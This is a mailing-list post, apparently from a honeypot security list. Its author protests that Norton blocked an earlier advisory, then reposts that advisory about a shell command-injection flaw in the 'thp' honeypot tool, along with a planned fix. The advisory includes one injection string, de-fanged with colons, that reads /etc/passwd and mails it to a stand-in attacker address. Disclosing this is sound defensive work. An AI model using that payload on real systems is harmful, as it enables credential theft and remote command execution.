For all those who are "blessed" with Norton's iron-clad A-V scanning, please note: The mail
that it blocked was intended to alert you of a vulnerablility, not exploit one. Perhaps Norton
needs to refine their signatures a bit, lest more advisories fail to be delivered.

Oh, by the way. Thank you, Norton, for letting me know the real names & mail identities of all
of the list members whose servers bounced this. Lance, I guess you may as well turn on the
"allow subscriber list queries" feature, since it is so easily circumvented. Come to think of
it (actually, someone here just suggested it), I think I'll start buying those cd-roms full of
email addresses, send this string to them, then use Norton's "alert" to build a list of Norton
customers. Do you think NAI would be interested in this? Thank you, Norton, for being such a
responsible member of the security community.

Here is the evil, horrible, virus-laden message that was blocked. I have put colons in between
the offending characters, so as not to set off any more alarms.

<----------evil, horrible virus-laden message follows--------->

There is a vulnerability with the way thp reads data from the inturder's
keystrokes & either logs or returns a response. It allows an attacker to execure
commands on the thp host with user "nobody" privilege.

EXPLANATION
In shell, "read VAR ;echo $VAR > file" seems innocuous at first, however, entering
a value of
                     (Time to remove those colons, folks)
$:(:c:a:t: :/:e:t:c:/:p:a:s:s:w:d: :|: :m:a:i:l: :b:a:d:g:u:y::o:o:p:s:.:n:e:t: :-:s:
:o:o:p:s:)
                        (stop removing colons here)
will do just that.
Quoting is easily circumvented by including the required closing quotes in the
value entered, thus ineffective.
This problem exists in a number of locations in logthis and thpsvcs.

I'm fixing the problem by using stty to return the keystrokes individualy,
treating carriage returns as a character and returning the prompt on its presence.
 I'll have it posted later today.

Until then, I have shut down the webserver alpinista.dyndns.org:81 and advise any
thp users to turn off xinetd until the fix is available. I'll notify the list
when it is ready.

gb

<----------end of evil, horrible virus-laden message--------->

---------------------------------------------------------------------
To unsubscribe, e-mail: honeypots-unsubscribesecurityfocus.com
For additional commands, e-mail: honeypots-helpsecurityfocus.com
---------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA) Service. For more information on SecurityFocus' SIA service
which automatically alerts you to the latest security vulnerabilities.
Please, see: https://alerts.securityfocus.com/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]